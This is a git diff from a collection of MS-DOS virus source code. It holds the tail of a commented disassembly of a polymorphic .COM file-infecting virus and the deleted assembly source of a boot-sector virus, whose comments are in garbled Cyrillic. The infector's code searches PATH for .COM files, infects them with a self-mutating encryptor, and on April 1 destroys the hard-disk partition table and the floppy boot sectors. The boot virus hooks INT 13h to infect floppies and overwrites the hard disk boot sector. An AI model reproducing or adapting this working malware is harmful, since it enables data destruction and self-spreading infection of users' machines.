0, 1, 2 -; 46 inc si version 3, 4, 5 -; 47 inc di version 6, 7, 8 - -0131 8A4EFE mov cl,[bp-02] ; restore block size -0134 E2F0 loop 0126 ; offset is decrypted! - -; encrypted part - -0136 FB sti - -; get address of curent DTA and store it on the stack - -0137 B42F mov ah,2F -0139 CD21 int 21 -013B 06 push es -013C 53 push bx - -; get keyboard status bits - -013D 33C0 xor ax,ax -013F 8ED8 mov ds,ax -0141 A01704 mov al,[0417] -0144 2410 and al,10 ; extract scroll lock state -0146 50 push ax ; store -0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag - -; restore DS - -014C 8CC8 mov ax,cs -014E 8ED8 mov ds,ax - -; intercepte INT 24h - -0150 BAC606 mov dx,06C6 -0153 B82425 mov ax,2524 ; set interrupt vector -0156 CD21 int 21 - -; search for PATH= in environment block - -0158 A12C00 mov ax,[002C] ; segment of environment block -015B 8EC0 mov es,ax -015D 33FF xor di,di ; begin of environment block -015F FC cld - -0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker -0164 741D je 0183 ; end fo block - -0166 BE1B05 mov si,051B ; offset of string 'PATH=' -0169 B90500 mov cx,0005 ; length of string -016C 8BC7 mov ax,di ; starting address -016E F3A6 rep cmpsb ; compare -0170 7411 je 0183 ; found - -0172 8BF8 mov di,ax ; last starting point -0174 32C0 xor al,al -0176 B5FF mov ch,FF ; maximum block size -0178 F2AE repnz scasb -017A 74E4 je 0160 - -017C BF1A05 mov di,051A ; end of buffer for path -017F 8CC8 mov ax,cs ; restore ES -0181 8EC0 mov es,ax -0183 C706C1056205 mov word ptr [05C1],0562 - -; set local DTA - -0189 BA3605 mov dx,0536 -018C B41A mov ah,1A ; set DTA -018E CD21 int 21 - -0190 A1F906 mov ax,[06F9] -0193 A3F706 mov [06F7],ax -0196 A1FD06 mov ax,[06FD] -0199 A3FB06 mov [06FB],ax -019C B90500 mov cx,0005 ; counter of potential victims -019F BA1505 mov dx,0515 ; '*.COM', 0 -01A2 06 push es -01A3 57 push di -01A4 51 push cx - -01A5 8CC8 mov ax,cs -01A7 8EC0 mov es,ax -01A9 B9FFFF mov cx,FFFF ; all possible attributes -01AC B44E mov ah,4E ; find first -01AE EB06 jmp 01B6 - -01B0 59 pop cx ; restore counter -01B1 E35B jcxz 020E ; limit reached, check show/destruction - -01B3 B44F mov ah,4F ; find next -01B5 51 push cx ; store counter - -01B6 CD21 int 21 -01B8 7203 jb 01BD ; continue - -01BA E9F100 jmp 02AE - -; restore address of path in environment block - -01BD 59 pop cx -01BE 5F pop di -01BF 07 pop es - -01C0 26803D00 cmp es:byte ptr [di],00 ; end of block? -01C4 744A je 0210 ; yes - -; copy path to buffer - -01C6 BB6205 mov bx,0562 ; offset of buffer - -01C9 268A05 mov al,es:[di] ; next character -01CC 0AC0 or al,al ; end of block? -01CE 740A je 01DA ; yes - -01D0 47 inc di -01D1 3C3B cmp al,3B ; ';', end of path? -01D3 7405 je 01DA ; yes - -01D5 8807 mov [bx],al ; copy character -01D7 43 inc bx ; increase pointer -01D8 EBEF jmp 01C9 ; get next character - -01DA 81FB6205 cmp bx,0562 ; buffer not empty? -01DE 74E0 je 01C0 ; empty - -01E0 8A47FF mov al,[bx-01] -01E3 3C3A cmp al,3A ; ':', root directory -01E5 7408 je 01EF ; yes - -01E7 3C5C cmp al,5C ; check last character, '\' -01E9 7404 je 01EF ; there is - -01EB C6075C mov byte ptr [bx],5C ; add '\' -01EE 43 inc bx ; pointer to last character -01EF 06 push es -01F0 57 push di -01F1 51 push cx -01F2 891EC105 mov [05C1],bx ; store it -01F6 8BF3 mov si,bx -01F8 81EB6205 sub bx,0562 ; find path length -01FC 8BCB mov cx,bx -01FE BF1405 mov di,0514 ; destination buffer -0201 8CC8 mov ax,cs ; restore ES -0203 8EC0 mov es,ax -0205 4E dec si -0206 FD std -0207 F3A4 rep movsb ; copy -0209 8BD7 mov dx,di -020B 42 inc dx -020C EB97 jmp 01A5 ; find first - -; end of infection proces, check condition for destruction/show - -020E 58 pop ax ; balance stack -020F 58 pop ax - -0210 8CC8 mov ax,cs ; restore ES -0212 8EC0 mov es,ax - -; get date - -0214 B42A mov ah,2A ; get date -0216 CD21 int 21 - -0218 81FA0104 cmp dx,0401 ; April 1? -021C 7533 jne 0251 ; no - -;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> -; -; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B: -; -;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> - -; copy partition table to sector 11h of side 0, track 0 - -021E BA8000 mov dx,0080 ; first hard drive -0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table) -0224 BB0307 mov bx,0703 ; destroy victim code -0227 B80102 mov ax,0201 ; read 1 sector -022A 52 push dx -022B 51 push cx -022C 53 push bx -022D CD13 int 13 ; disk I/O -022F 5B pop bx -0230 59 pop cx -0231 5A pop dx -0232 B111 mov cl,11 ; new place for partition table -0234 B80103 mov ax,0301 ; write partition table -0237 CD13 int 13 - -; set and of sector marker in the buffer - -0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker - -; overwrite partition table - -023F B280 mov dl,80 -0241 E87404 call 06B8 ; write one sector to disk - -; overwrite boot sector of drive A: - -0244 32D2 xor dl,dl -0246 E86F04 call 06B8 ; write one sector do disk - -; overwrite boot sector of drive B: - -0249 B201 mov dl,01 -024B E86A04 call 06B8 ; write disk - -024E EB0A jmp 025A -0250 90 nop - -; compare date - -0251 81FA180C cmp dx,0C18 ; december 24? -0255 7203 jb 025A ; date earlier - -;<><><><<><><><><><><><><><><><><><><><> -; -; CHRISTMAS SHOW -; -; see the description of subroutine 05D7 -;<><><><><><><><><><><><><><><><><><><><><> - -0257 E87D03 call 05D7 ; drow christmas tree - -; make sound - -025A E440 in al,40 -025C 3CF8 cmp al,F8 -025E 7206 jb 0266 - -0260 E461 in al,61 -0262 0C03 or al,03 -0264 E661 out 61,al - -; restore the state of scroll lock flag - -0266 33C0 xor ax,ax -0268 8ED8 mov ds,ax -026A 58 pop ax -026B 08061704 or [0417],al - -; restore INT 24h - -026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP -0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP -0279 B82425 mov ax,2524 ; set interrupt vector -027C CD21 int 21 - -; restore DTA - -027E 5A pop dx -027F 1F pop ds -0280 B41A mov ah,1A ; set DTA -0282 CD21 int 21 - -; restore DS - -0284 8CC8 mov ax,cs -0286 8ED8 mov ds,ax - -0288 BEF006 mov si,06F0 -028B 8B3EF706 mov di,[06F7] -028F 033EFB06 add di,[06FB] -0293 57 push di -0294 B90700 mov cx,0007 -0297 FC cld -0298 F3A4 rep movsb -029A 33C0 xor ax,ax -029C 8BD8 mov bx,ax -029E 8BD0 mov dx,ax -02A0 8BE8 mov bp,ax - -02A2 8B36F706 mov si,[06F7] -02A6 BF0001 mov di,0100 -02A9 8B0EFB06 mov cx,[06FB] -02AD C3 ret - -02AE BE5405 mov si,0554 ; file name in FCB -02B1 8B3EC105 mov di,[05C1] ; address of destination -02B5 B90D00 mov cx,000D ; length of asciiz string -02B8 FC cld -02B9 F3A4 rep movsb ; copy -02BB BF2005 mov di,0520 ; buffer for file name -02BE E8FA01 call 04BB ; copy -02C1 7503 jne 02C6 - -02C3 E9EAFE jmp 01B0 ; find next/destruct/show - -02C6 BF2B05 mov di,052B -02C9 E8EF01 call 04BB ; copy file name -02CC 7503 jne 02D1 - -02CE E9DFFE jmp 01B0 ; find next/destruct/show - -02D1 C606610500 mov byte ptr [0561],00 -02D6 90 nop -02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA -02DC 740F je 02ED ; hiden, system or read only, open file - -02DE BA6205 mov dx,0562 ; file name -02E1 33C9 xor cx,cx ; clear all attributes -02E3 B80143 mov ax,4301 ; set file attributes -02E6 CD21 int 21 -02E8 7303 jnb 02ED ; open file - -02EA E9C3FE jmp 01B0 ; find next/destruct/show - -02ED BA6205 mov dx,0562 -02F0 B8023D mov ax,3D02 ; open file for read/write -02F3 CD21 int 21 - -02F5 8BD8 mov bx,ax ; handle -02F7 7303 jnb 02FC - -02F9 E9B4FE jmp 01B0 ; find next - -; check file size - -02FC A15205 mov ax,[0552] ; high word of file size in DTA -02FF 0BC0 or ax,ax -0301 7403 je 0306 ; file below 64K - -0303 E99001 jmp 0496 ; close file and find next - -0306 A15005 mov ax,[0550] ; lower word of file size -0309 3D0700 cmp ax,0007 ; minimum file size -030C 72F5 jb 0303 ; close file and find next - -030E 3D00F8 cmp ax,F800 ; maximum file size -0311 73F0 jnb 0303 ; close file and find next - -; mayby already infected? - -0313 8B16F706 mov dx,[06F7] ; form address of bufer -0317 0316FB06 add dx,[06FB] -031B B90700 mov cx,0007 ; number of bytes -031E 52 push dx -031F 51 push cx -0320 B43F mov ah,3F ; read file -0322 CD21 int 21 - -0324 59 pop cx -0325 5E pop si -0326 7208 jb 0330 ; read error, close and find next - -; compare first 7 bytes with own code - -0328 BF0001 mov di,0100 ; destination -032B FC cld -032C F3A6 rep cmpsb -032E 7503 jne 0333 - -0330 E96301 jmp 0496 ; close file and find next, (infected!) - -; get and store file date and time - -0333 B80057 mov ax,5700 ; get file time stamp -0336 CD21 int 21 -0338 72F6 jb 0330 ; close file, find next - -033A 89160107 mov [0701],dx ; store date -033E 890EFF06 mov [06FF],cx ; store time -0342 C606610501 mov byte ptr [0561],01 -0347 90 nop - -; check file size, if less than 603h bytes then append some garbage - -0348 A15005 mov ax,[0550] ; file size -034B 3D0306 cmp ax,0603 -034E 7321 jnb 0371 - -; file length is less than 603h, add some garbage - -0350 33D2 xor dx,dx -0352 33C9 xor cx,cx -0354 B80242 mov ax,4202 ; move file ptr to EOF -0357 CD21 int 21 -0359 7303 jnb 035E ; no errors, continue - -035B E93801 jmp 0496 ; close file and find next - -035E B90306 mov cx,0603 ; number of bytes -0361 2B0E5005 sub cx,[0550] ; file size -0365 B440 mov ah,40 ; write file -0367 CD21 int 21 -0369 B80306 mov ax,0603 ; new file size -036C 7303 jnb 0371 - -036E E92501 jmp 0496 ; close file and find next - -; now file is at least 603h bytes long - -0371 FEC4 inc ah -0373 A3F906 mov [06F9],ax ; oryginal file size + 256 -0376 A15005 mov ax,[0550] ; file size -0379 BE0306 mov si,0603 ; virus length -037C 33FF xor di,di -037E 3BC6 cmp ax,si -0380 7302 jnb 0384 - -0382 8BF0 mov si,ax - -0384 8936FD06 mov [06FD],si - -0388 8BD7 mov dx,di -038A 33C9 xor cx,cx -038C B80042 mov ax,4200 ; move file ptr to BOF -038F CD21 int 21 -0391 7303 jnb 0396 - -0393 E90001 jmp 0496 ; close file and find next - -0396 8B16F706 mov dx,[06F7] -039A 0316FB06 add dx,[06FB] -039E B90002 mov cx,0200 -03A1 3BF1 cmp si,cx -03A3 7302 jnb 03A7 - -03A5 8BCE mov cx,si ; number of bytes - -03A7 52 push dx -03A8 51 push cx -03A9 B43F mov ah,3F ; read file -03AB CD21 int 21 -03AD 59 pop cx -03AE 5A pop dx -03AF 7303 jnb 03B4 ; continue - -03B1 E9E200 jmp 0496 ; close file and find next - -03B4 52 push dx -03B5 51 push cx -03B6 33D2 xor dx,dx -03B8 33C9 xor cx,cx -03BA B80242 mov ax,4202 ; move file ptr to EOF -03BD CD21 int 21 -03BF 59 pop cx -03C0 5A pop dx -03C1 7303 jnb 03C6 ; continue - -03C3 E9D000 jmp 0496 ; close file and find next - -03C6 B440 mov ah,40 ; write file -03C8 CD21 int 21 -03CA 7303 jnb 03CF - -03CC E9C700 jmp 0496 ; close file and find next - -03CF 81C70002 add di,0200 -03D3 81EE0002 sub si,0200 -03D7 7602 jbe 03DB - -03D9 EBAD jmp 0388 - -03DB FF060701 inc word ptr [0107] ; infection counter -03DF 33D2 xor dx,dx -03E1 33C9 xor cx,cx -03E3 B80042 mov ax,4200 ; move file ptr to BOF -03E6 CD21 int 21 -03E8 7303 jnb 03ED - -03EA E9A900 jmp 0496 ; close file and find next - -03ED 53 push bx ; store handle -03EE E440 in al,40 -03F0 A807 test al,07 -03F2 74FA je 03EE - -03F4 A21F01 mov [011F],al ; change decryption key - -; get random number from system timer count - -03F7 33C0 xor ax,ax -03F9 8AF8 mov bh,al -03FB 8ED8 mov ds,ax -03FD A06C04 mov al,[046C] ; timer, low byte - -0400 8CCA mov dx,cs ; restore DS -0402 8EDA mov ds,dx - -; generate rundom number in BX in the range 0..8 - -0404 B103 mov cl,03 -0406 F6F1 div cl ; AL <- AL/3, AH <- remainder -0408 8AEC mov ch,ah ; store remainder (0, 1 or 2) -040A 32E4 xor ah,ah ; prepare division -040C F6F1 div cl ; AL <- AL / 9, AH <- remainder -040E 8AC4 mov al,ah ; AL <- second remainder -0410 02C0 add al,al ; *2, AL in [0..4] -0412 02C4 add al,ah ; *3, AL in [0..6] -0414 02C5 add al,ch ; first remainder -0416 8AD8 mov bl,al ; BL in [0..8] - -; multiply BX by 4 (table entry size) - -0418 03DB add bx,bx -041A 03DB add bx,bx -041C 81C3C906 add bx,06C9 ; offset of table - -; modify encryption routine (automodyfication) - -0420 8A07 mov al,[bx] -0422 A22401 mov [0124],al ; 3 versions 5E/76/7E -0425 8B4701 mov ax,[bx+01] -0428 A32C01 mov [012C],ax ; 9 wersions -042B 8A4703 mov al,[bx+03] ; 3 versions -042E A23001 mov [0130],al -0431 8AC5 mov al,ch - -; prepare decrypt routine - -0433 BBED06 mov bx,06ED -0436 D7 xlat -0437 A26104 mov [0461],al ; modify decryption routine - -; write new encryption routine to file - -043A 5B pop bx ; restore handle -043B BA0001 mov dx,0100 ; begin of file -043E B93500 mov cx,0035 ; block size -0441 B440 mov ah,40 ; write file -0443 CD21 int 21 -0445 724F jb 0496 ; close file and find next - -; decryption routine - -0447 BE3501 mov si,0135 ; start of decrypted block -044A B9CE05 mov cx,05CE ; size of decrypted block -044D 53 push bx ; store handle -044E 51 push cx -044F B80002 mov ax,0200 -0452 8B1EF706 mov bx,[06F7] -0456 031EFB06 add bx,[06FB] -045A 53 push bx -045B 8A0E1F01 mov cl,[011F] ; decription key - -045F 8A2C mov ch,[si] -0461 D2CD ror ch,cl ; <-- changed (3 variants) - -; ^^ changed byte, possible wariants: -; 28CD sub ch,cl versions: 0, 3, 6 -; 30CD xor ch,cl versions: 1, 4, 7 -; D2CD ror ch,cl versions: 2, 5, 8 - -0463 882F mov [bx],ch -0465 43 inc bx -0466 46 inc si -0467 48 dec ax -0468 75F5 jne 045F - -046A 5A pop dx -046B 59 pop cx -046C 5B pop bx -046D 51 push cx -046E 81F90102 cmp cx,0201 -0472 7203 jb 0477 - -0474 B90002 mov cx,0200 -0477 B440 mov ah,40 ; write file -0479 CD21 int 21 -047B 59 pop cx -047C 7218 jb 0496 ; close file and find next - -047E 81E90002 sub cx,0200 -0482 77C9 ja 044D - -; restore file time stamp - -0484 8B160107 mov dx,[0701] ; file date -0488 8B0EFF06 mov cx,[06FF] ; file time -048C B80157 mov ax,5701 ; set file time stamp -048F CD21 int 21 -0491 7203 jb 0496 ; close file and find next - -; decrease counter on the stack - -0493 59 pop cx -0494 49 dec cx -0495 51 push cx - -0496 B43E mov ah,3E ; close file -0498 CD21 int 21 -049A 8A0E4B05 mov cl,[054B] ; attributes -049E FE0E6105 dec byte ptr [0561] -04A2 7405 je 04A9 - -04A4 F6C107 test cl,07 ; hidden, system, read only -04A7 740F je 04B8 - -04A9 80F920 cmp cl,20 ; archive -04AC 740A je 04B8 - -04AE BA6205 mov dx,0562 ; file name -04B1 32ED xor ch,ch -04B3 B80143 mov ax,4301 ; set file attributes -04B6 CD21 int 21 -04B8 E9F5FC jmp 01B0 ; find next - -;---------------------------------------- -; move 11 bytes do DS:DI ('C:\COMMAND.') - -04BB BE6205 mov si,0562 -04BE B90B00 mov cx,000B -04C1 FC cld -04C2 F3A6 rep cmpsb -04C4 C3 ret - -; buffer for path - -04C5 30 31 32 33 34 35 36 37 01234567 -04CD 38 39 30 31 32 33 34 35 89012345 -04D5 36 37 38 39 30 31 32 33 67890123 -04DD 34 35 36 37 38 39 30 31 45678901 -04E5 32 33 34 35 36 37 38 39 23456789 -04ED 30 31 32 33 34 35 36 37 01234567 -04F5 38 39 30 31 32 33 34 35 89012345 -04FD 36 37 38 43 3A 5C 4A 45 678C:\JE -0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P -050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\ - -; paterns for search - -0515 2A 2E 43 4F 4D 00 50 41 *.COM PA -051D 54 48 3D TH= - -; buffers for file names - -0520 49 42 4D 42 49 IBMBI -0525 4F 2E 43 4F 4D 00 O.COM - -052B 49 42 IB -052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM -0535 00 - -; local DTA - -0536 03 3F 3F 3F 3F 3F 3F ;\ -053D 3F 3F 43 4F 4D FF 02 00 ; | reserved -0545 00 00 00 00 00 00 ;/ -054B 20 ; file attribute -054C 00 60 71 0E ; file time stamp -0550 DB 62 00 00 ; file size -0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0) - -0561 01 ; flag: attributes are changed - -0562 43 3A 5C C:\ -0565 43 4F 4D 4D 41 4E 44 2E COMMAND. -056D 43 4F 4D 00 00 4D 00 00 COM M -0575 00 2E 43 4F 4D 00 4F 68 .COM Oh -057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo! -0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN -058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O -0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo -059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh -05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo! -05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN -05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O -05BD 68 4E 6F 21 hNo! - -05C1 65 05 ; - -;--------------------------------------- -; write character (or space) cx times - -05C3 B020 mov al,20 - -05C5 50 push ax -05C6 E89E00 call 0667 ; write character -05C9 58 pop ax -05CA E2F9 loop 05C5 -05CC C3 ret - -;------------- -; next line - -05CD B00D mov al,0D -05CF E89500 call 0667 ; write character -05D2 B00A mov al,0A -05D4 E99000 jmp 0667 ; write character - -;------------------------------ -; drow christmast tree -; -; result will look like this: -; -; -; ­ -; *** -; ***** -; ******* -; ********* -; *********** -; ************* -; *************** -; ***************** -; ******************* -; ********************* -; *********************** -; ************************* -; *************************** -; ***************************** -; ÛÛÛ -; ÛÛÛ -; ÛÛÛ -;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ -; Und er lebt doch noch : Der Tannenbaum ! -; Frohe Weihnachten ... -; - -05D7 B92700 mov cx,0027 -05DA E8E6FF call 05C3 ; clear 39 characters -05DD B0AD mov al,AD ; '­' -05DF E88500 call 0667 ; write character -05E2 E8E8FF call 05CD ; new line -05E5 BB0300 mov bx,0003 -05E8 BA2600 mov dx,0026 - -05EB 8BCA mov cx,dx -05ED E8D3FF call 05C3 ; write CX spaces -05F0 8BCB mov cx,bx -05F2 B02A mov al,2A ; '*' -05F4 E8CEFF call 05C5 ; write CX characters -05F7 E8D3FF call 05CD ; new line -05FA 4A dec dx -05FB 83C302 add bx,0002 -05FE 83FB1F cmp bx,001F -0601 75E8 jne 05EB - -0603 BB0300 mov bx,0003 -0606 B92600 mov cx,0026 -0609 E8B7FF call 05C3 ; write CX spaces -060C B90300 mov cx,0003 -060F B0DB mov al,DB ; 'Û' -0611 E8B1FF call 05C5 ; write CX characters -0614 E8B6FF call 05CD ; next line -0617 4B dec bx -0618 75EC jne 0606 - -061A B95000 mov cx,0050 ; full line -061D B0CD mov al,CD ; 'Í' -061F E8A3FF call 05C5 ; write character CX times -0622 B91300 mov cx,0013 -0625 E89BFF call 05C3 ; write CX spaces -0628 BB7406 mov bx,0674 ; string: Und er lebt doch ... -062B E82C00 call 065A ; write string -062E B91D00 mov cx,001D -0631 E88FFF call 05C3 ; clear part of line -0634 EB24 jmp 065A ; write asciiz string pointed by BX -0636 90 nop - -0637 E80000 call 063A - -063A 5B pop bx -063B 83C30D add bx,000D -063E 8CC8 mov ax,cs -0640 8ED8 mov ds,ax -0642 E81500 call 065A ; write string -0645 EBFE jmp 0645 ; hang CPU - -0647 41 70 72 69 6C 2C 20 41 April, A -064F 70 72 69 6C 20 2E 2E 2E pril ... -0657 20 07 00 - -;----------------------------------- -; write asciiz string pointed by BX - -065A 8A07 mov al,[bx] ; get character -065C 43 inc bx ; next character -065D 0AC0 or al,al ; and of string? -065F 7405 je 0666 ; yes, RET - -0661 E80300 call 0667 ; write character -0664 EBF4 jmp 065A ; get next character -0666 C3 ret - -;-------------------- -; write character TTL - -0667 52 push dx -0668 51 push cx -0669 53 push bx -066A 32FF xor bh,bh -066C B40E mov ah,0E -066E CD10 int 10 -0670 5B pop bx -0671 59 pop cx -0671 59 pop cx -0672 5A pop dx -0673 C3 ret - -0674 55 6E 64 20 65 72 20 6C Und er l -067C 65 62 74 20 64 6F 63 68 ebt doch -0684 20 6E 6F 63 68 20 3A 20 noch : -068C 44 65 72 20 54 61 6E 6E Der Tann -0694 65 6E 62 61 75 6D 20 21 enbaum ! -069C 0D 0A 00 46 72 6F 68 65 Frohe -06A4 20 57 65 69 68 6E 61 63 Weihnac -06AC 68 74 65 6E 20 2E 2E 2E hten ... -06B4 0D 0A 07 00 - -;------------------------------------------ -; write one sector to disk specified in DL -; track 9, side 0 sector 1 - -06B8 32F6 xor dh,dh -06BA B90100 mov cx,0001 -06BD BB3706 mov bx,0637 -06C0 B80103 mov ax,0301 -06C3 CD13 int 13 -06C5 C3 ret - -;================== -; INT 24h handler - -06C6 B000 mov al,00 -06C8 CF iret - -; table of bytes for changing encrypt routine - -06C9 5E 00 0F 43 -06CD 5E 30 0F 43 -06D1 5E D2 07 43 -06D5 76 00 0C 46 -06D9 76 30 0C 46 -06DD 76 D2 04 46 -06E1 7E 00 0D 47 -06E5 7E 30 0D 47 -06E9 7E D2 05 47 - -; table for variants of decrypt routine - -06ED 28 30 D2 - -; part of victime code - -06F0 F3A4 rep movsb -06F2 8BF1 mov si,cx -06F4 8BF9 mov di,cx -06F6 C3 ret - -06F7 0307 ; offset of buffer/modified code -06F9 DB63 ; file size + 256 -06FB C603 ; -06FD 0306 ; -06FF 0060 ; file date -0701 710E ; file time - diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xpart.asm b/MSDOS/X-Index/Virus.MSDOS.Unknown.xpart.asm deleted file mode 100644 index 03614d07..00000000 --- a/MSDOS/X-Index/Virus.MSDOS.Unknown.xpart.asm +++ /dev/null @@ -1,241 +0,0 @@ - jmp far ptr loc_2 ;*(07C0:0005) - jmp loc_8 ; (00A1) -data_27 db 0 -data_28 dd 0F000EC59h -data_29 dd 9F8000E4h -data_30 dd 07C00h - -;----------------------------------------------------------------------------- -; ‚µ®¤­  ²®·ª  ­  INT 13h -;----------------------------------------------------------------------------- - - push ds - push ax - cmp ah,2 ; €ª® ´³­ª¶¨¿²  ¥ ¯®-¬ «ª  ®² - jb loc_3 ; 2 ¨«¨ ¯®-£®«¿¬  ¨«¨ ° ¢­  - cmp ah,4 ; ­  4 ¨§¯º«­¿¢  ­ ¯°° ¢® INT 13h - jae loc_3 - or dl,dl ; “±²°®¨±²¢®²® ¥ A ? - jnz loc_3 - xor ax,ax ; Zero register - mov ds,ax - mov al,byte ptr ds:[43Fh] ; °®¢¥°¿¢  ¤ «¨ ¬®²®°  ­  - test al,1 ; A ¥ ¢ª«¾·¥­ - jnz loc_3 ; Jump if not zero - call sub_1 ; Ž¯¨² ¤  § ° §¿¢  -loc_3: - pop ax - pop ds - jmp cs:data_28 ; (6B8E:0009=0EC59h) - -;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß -; SUBROUTINE -;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ - -sub_1 proc near - push bx - push cx - push dx ; ‡ ¯ §¢  °¥£¨±²°¨²¥ - push es - push si - push di - mov si,4 -loc_4: - mov ax,201h - push cs - pop es - mov bx,200h - xor cx,cx ; Zero register - mov dx,cx - inc cx - pushf - call cs:data_28 ; —¥²¥ BOOT ±¥ª²®°  - jnc loc_5 ; Jump if carry=0 - xor ax,ax ; °¨ £°¥¸ª  °¥ª «¨¡°¨°  - pushf ; ³±²°®¨±²¢®²® - call cs:data_28 ; (6B8E:0009=0EC59h) - dec si - jnz loc_4 ; ° ¢¨ 4 ®¯¨²  - jmp short loc_7 ; ˆ§µ®¤ - nop -loc_5: - xor si,si ; Zero register - mov di,200h - cld ; Clear direction - push cs - pop ds - lodsw ; °®¢¥°¿¢  ¤ «¨ ¥ § ° §¥­ - cmp ax,[di] ; ¯°®·¥²¥­¨¿ ¤¨±ª - jne loc_6 - lodsw - cmp ax,[di+2] - je loc_7 ; €ª® ¥ ¨§«¨§  -loc_6: - mov ax,301h - mov bx,200h ; °¥¬¥±²¢  BOOT - mov cl,3 - mov dh,1 - pushf - call cs:data_28 - jc loc_7 ; Jump if carry Set - mov ax,301h - xor bx,bx ; ‡ ¯¨±¢  ¢¨°³±  - mov cl,1 - xor dx,dx - pushf - call cs:data_28 -loc_7: - pop di - pop si - pop es ; ‚º§±² ­®¢¿¢  °¥£¨±²°¨²¥ - pop dx - pop cx - pop bx - retn -sub_1 endp - -loc_8: - xor ax,ax ; Zero register - mov ds,ax - cli ; Disable interrupts - mov ss,ax - mov sp,7C00h - sti ; - mov ax,word ptr ds:[4Ch] ; ®±² ¢¿ ¢ AX ¢¥ª²®°  ­  INT 13H - mov word ptr ds:[7C09h],ax ; ‡ ¯ §¢  £® ­  ®²¬¥±²¢ ­¥ 9h - mov ax,word ptr ds:[4Eh] ; ‚§¥¬  ±¥£¬¥­²  ­  INT 13H - mov word ptr ds:[7C0Bh],ax ; ‡ ¯ §¢  £® ­  ®²¬¥±²¢ ­¥ Bh - mov ax,word ptr ds:[413h] ;  ¬ «¿¢  ­ «¨·­ ²  ¯ ¬¥² ± 1K - dec ax - dec ax - mov word ptr ds:[413h],ax - mov cl,6 - shl ax,cl - mov es,ax ; ‡ °¥¦¤  ¢ ES ­ ©-¢¨±®ª¨¿  ¤°¥± - mov word ptr ds:[7C0Fh],ax ; ­  ª®©²® ±¥ ¯°¥¬¥±²¢  - mov ax,15h - mov word ptr ds:[4Ch],ax ; INT 13H ‘Ž—ˆ Ž’Œ…‘’‚€… 15H Ž’ - mov word ptr ds:[4Eh],es ; Ž—€‹Ž’Ž Œ“ - mov cx,1B8h - push cs ;CS = 7C0h = DS - pop ds - xor si,si - mov di,si - cld - rep movsb ; °¥±²¢  1B8h ¡ ©²  - jmp cs:data_29 ; °¥µ®¤ ­  ±«¥¤¢ ¹ ²  ¨­±²°³ª¶¨¿ - mov ax,0 - int 13h ; ¥ª «¨¡°¨°  ¤¨±ª  - - xor ax,ax ; Zero register - mov es,ax ; ES = AX = 00h - mov ax,201h ; “±² ­®¢¿¢  ¯ ° ¬¥²°¨ §  - mov bx,7C00h ; § °¥¦¤ ­¥ ­  BOOT - cmp cs:data_27,0 ; °®¢¥°¿¢  ´« £ §  ³±²°®¨±²¢® - je loc_9 ; °¥µ®¤ ¯°¨ Flopy disk - mov cx,7 - mov dx,80h - int 13h ; ‡ °¥¦¤  BOOT - - jmp short loc_12 ; (014E) - nop -loc_9: - mov cx,3 - mov dx,100h - int 13h ; ‡ °¥¦¤  BOOT - - jc loc_12 ; Jump if carry Set - test byte ptr es:[46Ch],7 ; °®¢¥°¿¢  ¤ «¨ ¤  ¤ ¤¥ - jnz loc_11 ; ±º®¡¹¥­¨¥ - mov si,189h ; - push cs - pop ds -loc_10: - lodsb ; ’º°±¨ ª° ¿² ­  ±²°¨­£  - or al,al - jz loc_11 ; €ª® ­¥ ¥ ª° ¿ ¨§¢¥¦¤  ±¨¬¢®« - mov ah,0Eh - mov bh,0 - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - jmp short loc_10 ; (011D) -loc_11: - push cs - pop es - mov ax,201h ; Ž¯¨²¢  ±¥ ¤  ·¥²¥ ®² ²¢º°¤ ¤¨±ª - mov bx,200h ; ª ²® ¯®¬¥±²¢  ¯°®·¥²¥­®²® ®² - mov cl,1 ; ®²¬¥±²¢ ­¥ 200h - mov dx,80h - int 13h ; Disk dl=drive #: ah=func a2h - ; read sectors to memory es:bx - jc loc_12 ; €ª® £°¥¸ª  ? -> ˆ§µ®¤ - push cs - pop ds - mov si,200h - mov di,0 - lodsw ; °®¢¥°¿¢  ¤ «¨ ±º¢¯ ¤  ± ­ · «®²® - cmp ax,[di] ; ­  ¢¨°³±  - jne loc_13 ; €ª® ­¥ ¯°¥µ®¤ §  § ° §¿¢ ­¥ - lodsw - cmp ax,[di+2] - jne loc_13 -loc_12: - mov cs:data_27,0 ; (6B8E:0008=0) - jmp cs:data_30 ; ˆ§¯º«­¿¢  BOOT -loc_13: - mov cs:data_27,2 ; ®±² ¢¿ ³ª § ²¥« ²¢º°¤ ¤¨±ª - mov ax,301h - mov bx,200h ; °¥¬¥±²¢  BOOT ¢ ±¥ª²®° 7 